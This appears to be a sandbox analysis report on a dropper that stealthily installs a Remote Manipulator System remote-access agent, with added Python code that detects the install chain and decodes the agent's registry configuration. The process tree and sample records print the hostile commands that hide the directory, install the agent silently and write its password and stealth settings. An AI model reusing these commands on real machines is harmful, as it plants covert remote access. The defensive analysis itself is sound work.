Analysis
-
max time kernel
149s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system -
submitted
27-11-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Resource
win7-20220901-en
General
-
Target
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
-
Size
3.3MB
-
MD5
6627f3503fd971c24f274d670b9d6cd7
-
SHA1
b77b984497b6c3d1d695de6363b1b35d9a4c192e
-
SHA256
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e
-
SHA512
cf9210fa61eb5fec5d8d3bf2ea7e22c1f2d5f54c5f80b71c4146f73a4369a3ea0e5b7489750ff6ec00fee347398d023fb8580c1a4e134932cbd3ff555b9f380a
-
SSDEEP
98304:VgwRLgSX5ZcttvsdEv9eL4UezmlplRUSJLWpAh:VgOgSX/GW+1SezmXlRDRT
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
pid   process
3852  data.exe
2860  rutserv.exe
4776  rutserv.exe
4916  rutserv.exe
4840  rutserv.exe
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Processes:
resource                                          yara_rule
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe  upx
C:\Windows\spom\rfusclient.exe                    upx
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                       process
Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
-
Checks whether UAC is enabled 1 IoCs
Processes:
description        ioc                                                                                 process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  data.exe
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource                                    yara_rule
C:\Users\Admin\AppData\Local\Temp\data.exe  autoit_exe
C:\Users\Admin\AppData\Local\Temp\data.exe  autoit_exe
C:\Users\Admin\AppData\Local\Temp\hide.exe  autoit_exe
-
Drops file in Windows directory 64 IoCs
Processes:
description                  ioc                                                                                  process
File created                 C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt          cmd.exe
File opened for modification C:\Windows\spom\JavaDeployReg.log                                                    cmd.exe
File opened for modification C:\Windows\spom\tmpBC08.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\wct611B.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\WIJBFSKT-20221111-1347.log                                           cmd.exe
File created                 C:\Windows\spom\WIJBFSKT-20221111-1347a.log                                          cmd.exe
File created                 C:\Windows\spom\dd_vcredistMSI15DD.txt                                               cmd.exe
File created                 C:\Windows\spom\hide.exe                                                             cmd.exe
File created                 C:\Windows\spom\jawshtml.html                                                        cmd.exe
File opened for modification C:\Windows\spom\jusched.log                                                          cmd.exe
File opened for modification C:\Windows\spom\nouac.cmd                                                            cmd.exe
File created                 C:\Windows\spom\WIJBFSKT-20221111-1347.log                                           cmd.exe
File created                 C:\Windows\spom\rfusclient.exe                                                       cmd.exe
File opened for modification C:\Windows\spom\BroadcastMsg_1668174376.txt                                          cmd.exe
File opened for modification C:\Windows\spom\hide.exe                                                             cmd.exe
File opened for modification C:\Windows\spom\tmpBE88.tmp                                                          cmd.exe
File created                 C:\Windows\spom\wct611B.tmp                                                          cmd.exe
File created                 C:\Windows\spom\wct66BA.tmp                                                          cmd.exe
File created                 C:\Windows\spom\wctB774.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\aria-debug-1468.log                                                  cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistUI1607.txt                                                cmd.exe
File created                 C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html         cmd.exe
File created                 C:\Windows\spom\uac.cmd                                                              cmd.exe
File created                 C:\Windows\spom\JavaDeployReg.log                                                    cmd.exe
File created                 C:\Windows\spom\rutserv.exe                                                          cmd.exe
File opened for modification C:\Windows\spom\rutserv.exe                                                          cmd.exe
File created                 C:\Windows\spom\tmpBE88.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\uac.cmd                                                              cmd.exe
File created                 C:\Windows\spom\data.exe                                                             cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistMSI1607.txt                                               cmd.exe
File created                 C:\Windows\spom\jusched.log                                                          cmd.exe
File opened for modification C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat                          cmd.exe
File opened for modification C:\Windows\spom\wctB774.tmp                                                          cmd.exe
File created                 C:\Windows\spom\wmsetup.log                                                          cmd.exe
File opened for modification C:\Windows\spom\AdobeSFX.log                                                         cmd.exe
File created                 C:\Windows\spom\chrome_installer.log                                                 cmd.exe
File created                 C:\Windows\spom\dd_vcredistUI15DD.txt                                                cmd.exe
File created                 C:\Windows\spom\dd_vcredistUI1607.txt                                                cmd.exe
File opened for modification C:\Windows\spom\rfusclient.exe                                                       cmd.exe
File created                 C:\Windows\spom\tmpBC08.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\wct66BA.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\chrome_installer.log                                                 cmd.exe
File opened for modification C:\Windows\spom\data.exe                                                             cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistMSI15DD.txt                                               cmd.exe
File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html         cmd.exe
File created                 C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat                          cmd.exe
File created                 C:\Windows\spom\wct19BD.tmp                                                          cmd.exe
File created                 C:\Windows\spom\dd_vcredistMSI1607.txt                                               cmd.exe
File created                 C:\Windows\spom\msedge_installer.log                                                 cmd.exe
File created                 C:\Windows\spom\nouac.cmd                                                            cmd.exe
File opened for modification C:\Windows\spom\wct805B.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\dd_vcredistUI15DD.txt                                                cmd.exe
File created                 C:\Windows\spom\wct805B.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\msedge_installer.log                                                 cmd.exe
File opened for modification C:\Windows\spom\wctC330.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\wmsetup.log                                                          cmd.exe
File created                 C:\Windows\spom\aria-debug-1468.log                                                  cmd.exe
File created                 C:\Windows\spom\BroadcastMsg_1668174376.txt                                          cmd.exe
File created                 C:\Windows\spom\wctC330.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom                                                                      attrib.exe
File created                 C:\Windows\spom\AdobeSFX.log                                                         cmd.exe
File opened for modification C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt          cmd.exe
File opened for modification C:\Windows\spom\wct19BD.tmp                                                          cmd.exe
File opened for modification C:\Windows\spom\jawshtml.html                                                        cmd.exe
-
Launches sc.exe 2 IoCs
sc.exe is a Windows utility to control services on the system.
Processes:
pid   process
3096  sc.exe
3276  sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
pid   process      events
2860  rutserv.exe  6
4776  rutserv.exe  2
4916  rutserv.exe  2
4840  rutserv.exe  6
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
description                      pid   process
Token: SeDebugPrivilege          2860  rutserv.exe
Token: SeDebugPrivilege          4916  rutserv.exe
Token: SeTakeOwnershipPrivilege  4840  rutserv.exe
Token: SeTcbPrivilege            4840  rutserv.exe
Token: SeTcbPrivilege            4840  rutserv.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid   process   events
3852  data.exe  3
-
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid   process   events
3852  data.exe  3
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid   process
2860  rutserv.exe
4776  rutserv.exe
4916  rutserv.exe
4840  rutserv.exe
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes (each source/target pair below is recorded three times in the report, 21 pairs = 63 IoCs):
pid   process                                                                   target pid  target process
2152  408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe      3852        data.exe
2152  408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe      3856        cmd.exe
3852  data.exe                                                                  2620        cmd.exe
2620  cmd.exe                                                                   4316        net.exe
4316  net.exe                                                                   4528        net1.exe
2620  cmd.exe                                                                   2820        net.exe
2820  net.exe                                                                   2244        net1.exe
2620  cmd.exe                                                                   3096        sc.exe
2620  cmd.exe                                                                   3276        sc.exe
2620  cmd.exe                                                                   4724        reg.exe
2620  cmd.exe                                                                   3488        attrib.exe
2620  cmd.exe                                                                   2860        rutserv.exe
2620  cmd.exe                                                                   4776        rutserv.exe
2620  cmd.exe                                                                   3532        reg.exe
2620  cmd.exe                                                                   3224        reg.exe
2620  cmd.exe                                                                   2584        reg.exe
2620  cmd.exe                                                                   4884        reg.exe
2620  cmd.exe                                                                   3804        reg.exe
2620  cmd.exe                                                                   3728        reg.exe
2620  cmd.exe                                                                   2444        reg.exe
2620  cmd.exe                                                                   4916        rutserv.exe
-
Views/modifies file attributes 1 TTPs 1 IoCs
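The signatures above (Stops running service(s), Launches sc.exe, Runs net.exe, Sets file to hidden, Executes dropped EXE) are individually unremarkable on an admin workstation; what makes this sample recognisable is that one cmd.exe drives all of them in sequence: stop and delete the existing Remote Manipulator System services, wipe its registry key, drop a fresh copy into a hidden directory under C:\Windows, write the agent configuration straight into the registry, then start it. The following detection is an added example written for this report, not part of the sandbox output. It walks process-creation records as a parent/child tree and scores each cmd.exe by how many stages its descendants hit. The record layout (pid, ppid, image, command line) is an assumption rather than any particular EDR schema; the sample records are constructed from this report's process tree and WriteProcessMemory list, with the long REG_BINARY payloads elided, and the pairing of reg.exe PIDs to value names follows tree order.

```python
"""Hunt for the 'tear down, hide, re-install, configure, start' RMS chain in
process-creation records.  Added example; not code from the report."""
import re
from collections import defaultdict

# One regex per stage, matched case-insensitively against a descendant's command line.
STAGES = [
    ("stop_rms_service",   r"\bnet1?(?:\.exe)?\s+stop\s+(?:rmanservice|netaservice)\b"),
    ("delete_rms_service", r"\bsc(?:\.exe)?\s+delete\s+(?:rmanservice|netaservice)\b"),
    ("wipe_rms_regkey",    r'\breg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\Remote Manipulator System'),
    ("hide_install_dir",   r"\battrib(?:\.exe)?\s+(?:\+[sh]\s+){2}"),
    ("silent_install",     r'\brutserv(?:\.exe)?"?\s+/silentinstall\b'),
    ("firewall_rule",      r'\brutserv(?:\.exe)?"?\s+/firewall\b'),
    ("write_rms_config",   r'\breg(?:\.exe)?\s+add\s+"?HKLM\\SYSTEM\\Remote Manipulator System\\v4\\Server\\Parameters'),
    ("start_service",      r'\brutserv(?:\.exe)?"?\s+/start\b'),
]

SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"
TEMP, SYS32, SPOM = r"C:\Users\Admin\AppData\Local\Temp", r"C:\Windows\SysWOW64", r"C:\Windows\spom"
PARAMS = r"HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters"


def regadd(value, typ, data="<elided>"):
    # REG_BINARY payloads are long and not needed for matching; elided in these constructed records.
    return f'REG ADD "{PARAMS}" /f /v "{value}" /t {typ} /d {data}'


# (pid, ppid, image, command line) constructed from the report's process tree.
# ppid 0 marks processes whose parent the tree does not show.
SAMPLE = [
    (2152, 0,    SAMPLE_EXE,              f'"{SAMPLE_EXE}"'),
    (3852, 2152, TEMP + r"\data.exe",     f'"{TEMP}\\data.exe"'),
    (3856, 2152, SYS32 + r"\cmd.exe",     f'C:\\Windows\\system32\\cmd.exe /c ""{TEMP}\\7ZSfx000.cmd" "'),
    (2620, 3852, SYS32 + r"\cmd.exe",     r"C:\Windows\system32\cmd.exe /c nouac.cmd"),
    (4316, 2620, SYS32 + r"\net.exe",     "net stop netaservice"),
    (4528, 4316, SYS32 + r"\net1.exe",    r"C:\Windows\system32\net1 stop netaservice"),
    (2820, 2620, SYS32 + r"\net.exe",     "net stop rmanservice"),
    (2244, 2820, SYS32 + r"\net1.exe",    r"C:\Windows\system32\net1 stop rmanservice"),
    (3096, 2620, SYS32 + r"\sc.exe",      "sc delete netaservice"),
    (3276, 2620, SYS32 + r"\sc.exe",      "sc delete rmanservice"),
    (4724, 2620, SYS32 + r"\reg.exe",     r'reg delete "HKLM\SYSTEM\Remote Manipulator System" /f'),
    (3488, 2620, SYS32 + r"\attrib.exe",  r'attrib +s +h "C:\Windows\spom"'),
    (2860, 2620, SPOM + r"\rutserv.exe",  '"rutserv.exe" /silentinstall'),
    (4776, 2620, SPOM + r"\rutserv.exe",  '"rutserv.exe" /firewall'),
    (3532, 2620, SYS32 + r"\reg.exe",     regadd("notification", "REG_BINARY")),
    (3224, 2620, SYS32 + r"\reg.exe",     regadd("UserAccess", "REG_BINARY")),
    (2584, 2620, SYS32 + r"\reg.exe",     regadd("Password", "REG_BINARY")),
    (4884, 2620, SYS32 + r"\reg.exe",     regadd("InternetId", "REG_BINARY")),
    (3804, 2620, SYS32 + r"\reg.exe",     regadd("Options", "REG_BINARY")),
    (3728, 2620, SYS32 + r"\reg.exe",     regadd("FUSClientPath", "REG_SZ", f'"{SPOM}\\rfusclient.exe"')),
    (2444, 2620, SYS32 + r"\reg.exe",     regadd("CalendarRecordSettings", "REG_BINARY")),
    (4916, 2620, SPOM + r"\rutserv.exe",  '"rutserv.exe" /start'),
    (4840, 0,    SPOM + r"\rutserv.exe",  SPOM + r"\rutserv.exe"),
]

# Control set (constructed): an admin querying and stopping the service by hand hits one stage only.
BENIGN = [
    (100, 0,   SYS32 + r"\cmd.exe", "cmd.exe"),
    (101, 100, SYS32 + r"\sc.exe",  "sc query rmanservice"),
    (102, 100, SYS32 + r"\net.exe", "net stop rmanservice"),
]


def find_rms_install_chains(records, min_stages=4):
    """One alert per cmd.exe whose descendants (any depth) hit >= min_stages stages."""
    by_pid = {r[0]: r for r in records}
    children = defaultdict(list)
    for pid, ppid, _image, _cmd in records:
        children[ppid].append(pid)

    def descendants(pid):
        out, stack = [], list(children[pid])
        while stack:
            p = stack.pop()
            out.append(p)
            stack.extend(children[p])
        return out

    alerts = []
    for pid, _ppid, image, cmd in records:
        if not image.lower().endswith("\\cmd.exe"):
            continue
        cmdlines = [by_pid[d][3] for d in descendants(pid)]
        hits = [label for label, rx in STAGES if any(re.search(rx, c, re.I) for c in cmdlines)]
        if len(hits) < min_stages:
            continue
        install_dir, values = None, []
        for c in cmdlines:
            m = re.search(r'\battrib\b.*?"([^"]+)"', c, re.I)          # directory being hidden
            if m:
                install_dir = m.group(1)
            m = re.search(r'\breg(?:\.exe)?\s+add\b.*?/v\s+"([^"]+)"', c, re.I)  # value names written
            if m:
                values.append(m.group(1))
        alerts.append({"root_pid": pid, "root_cmdline": cmd, "stages": hits,
                       "install_dir": install_dir, "config_values": values})
    return alerts


if __name__ == "__main__":
    for alert in find_rms_install_chains(SAMPLE):
        print(f"cmd.exe pid {alert['root_pid']}: {alert['root_cmdline']}")
        print("  stages:", ", ".join(alert["stages"]))
        print("  hidden install dir:", alert["install_dir"])
        print("  registry values written:", ", ".join(alert["config_values"]))
```

The threshold of four stages is deliberately below the eight seen here: a variant that skips the service teardown (first install on a clean host) or the firewall step still scores high enough, while a lone `net stop rmanservice` from an administrator does not.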
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\data.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\data.exe"
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c nouac.cmd
            - Drops file in Windows directory
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\net.exe
                cmdline: net stop netaservice
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\net1.exe
                    cmdline: C:\Windows\system32\net1 stop netaservice
            [4] C:\Windows\SysWOW64\net.exe
                cmdline: net stop rmanservice
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\net1.exe
                    cmdline: C:\Windows\system32\net1 stop rmanservice
            [4] C:\Windows\SysWOW64\sc.exe
                cmdline: sc delete netaservice
                - Launches sc.exe
            [4] C:\Windows\SysWOW64\sc.exe
                cmdline: sc delete rmanservice
                - Launches sc.exe
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
            [4] C:\Windows\SysWOW64\attrib.exe
                cmdline: attrib +s +h "C:\Windows\spom"
                - Sets file to hidden
                - Drops file in Windows directory
                - Views/modifies file attributes
            [4] C:\Windows\spom\rutserv.exe
                cmdline: "rutserv.exe" /silentinstall
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
            [4] C:\Windows\spom\rutserv.exe
                cmdline: "rutserv.exe" /firewall
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of SetWindowsHookEx
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d [REG_BINARY data not shown in the report]
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034 00 (value truncated in the report)
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d [REG_BINARY data not shown in the report]
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323951566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
            [4] C:\Windows\SysWOW64\reg.exe
                cmdline: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d [REG_BINARY data not shown in the report]
            [4] C:\Windows\spom\rutserv.exe
                cmdline: "rutserv.exe" /start
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
[1] C:\Windows\spom\rutserv.exe
    cmdline: C:\Windows\spom\rutserv.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    [2] C:\Windows\spom\rfusclient.exe
        cmdline: C:\Windows\spom\rfusclient.exe
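The "Options" value written by the REG ADD line in the tree above is the whole server-side configuration of the dropped Remote Manipulator System agent, and it is readable: it starts with the bytes 54 50 46 30 ("TPF0"), which is the Delphi binary form stream that Remote Utilities uses to serialise its settings object. The stream is a class name, an object name, and then (property name, type byte, value) triples until an empty name. The parser below is an added example written for this report, not code from the sandbox or from Remote Utilities; the type codes are Delphi's standard TValueType numbering and only the kinds needed for this blob (plus a few common siblings) are implemented, with anything else raising rather than being misread. The hex it decodes is the Options value exactly as shown in the tree, and the list of visibility-related property names used for the stealth summary is my own choice of what an analyst would look at first.

```python
r"""Decode the REG_BINARY "Options" value written under
HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters (a Delphi TPF0
form stream).  Added example, not code from the report or from Remote Utilities."""
import struct

# Delphi TValueType codes (Classes unit); only the ones handled below.
VA_INT8, VA_INT16, VA_INT32, VA_STRING, VA_IDENT = 2, 3, 4, 6, 7
VA_FALSE, VA_TRUE, VA_BINARY, VA_LSTRING = 8, 9, 10, 12
VA_WSTRING, VA_INT64, VA_UTF8STRING = 18, 19, 20

# "Options" data from the REG ADD line in the process tree above.
OPTIONS_HEX = (
    "545046301154524f4d5365727665724f7074696f6e7300"
    "095573654e5441757468080d53656375726974794c6576656c020304506f7274031216"
    "14456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e74657266616365"
    "1343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202"
    "105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e677308"
    "0f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027"
    "134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e08"
    "11557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e657449644950763608"
    "1444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e7366657208"
    "0f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e6167657208"
    "0e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c65507265766965774361707475726508"
    "1444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c6541564361707475726508"
    "1244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e677308"
    "1544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08"
    "104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f675573650805536964496406"
    "1034323030392e37343435313730303233084c6963656e73657306ae524d532d462d6236666566464533443636323134653936394433374439616365323542303236"
    "6269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e"
    "4841494341514a76594878704141734c4141734d486c516d63323951566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000"
    "efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e"
    "3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e"
    "3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e"
    "3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000"
)


class TPF0Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError(f"blob truncated at offset {self.pos}")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def short_string(self) -> str:          # 1-byte length prefix, 8-bit payload
        return self.take(self.take(1)[0]).decode("latin-1")

    def value(self):
        t = self.take(1)[0]
        if t in (VA_INT8, VA_INT16, VA_INT32, VA_INT64):
            fmt = {VA_INT8: "<b", VA_INT16: "<h", VA_INT32: "<i", VA_INT64: "<q"}[t]
            return struct.unpack(fmt, self.take(struct.calcsize(fmt)))[0]
        if t in (VA_STRING, VA_IDENT):
            return self.short_string()
        if t in (VA_FALSE, VA_TRUE):
            return t == VA_TRUE
        if t in (VA_BINARY, VA_LSTRING, VA_UTF8STRING, VA_WSTRING):
            n = struct.unpack("<I", self.take(4))[0]   # 4-byte little-endian length
            if t == VA_WSTRING:
                return self.take(2 * n).decode("utf-16-le")
            raw = self.take(n)
            if t == VA_BINARY:
                return raw
            return raw.decode("utf-8-sig" if t == VA_UTF8STRING else "latin-1")
        raise ValueError(f"unsupported TValueType {t} at offset {self.pos - 1}")


def parse_rms_options(hex_blob: str) -> dict:
    r = TPF0Reader(bytes.fromhex(hex_blob))
    if r.take(4) != b"TPF0":
        raise ValueError("not a Delphi TPF0 stream")
    cls, name, props = r.short_string(), r.short_string(), {}
    while (key := r.short_string()) != "":     # empty name ends the property list
        props[key] = r.value()
    return {"class": cls, "name": name, "props": props}


# Properties that, when False, keep the logged-on user from noticing the agent
# (my selection, not a list from Remote Utilities).
VISIBILITY_KEYS = ("ShowTrayIcon", "NotifyShowPanel", "NotifyChangeTrayIcon",
                   "NotifyBallonHint", "NotifyPlaySound", "AskUserPermission")


def stealth_indicators(props: dict) -> list:
    return [k for k in VISIBILITY_KEYS if props.get(k) is False]


if __name__ == "__main__":
    parsed = parse_rms_options(OPTIONS_HEX)
    p = parsed["props"]
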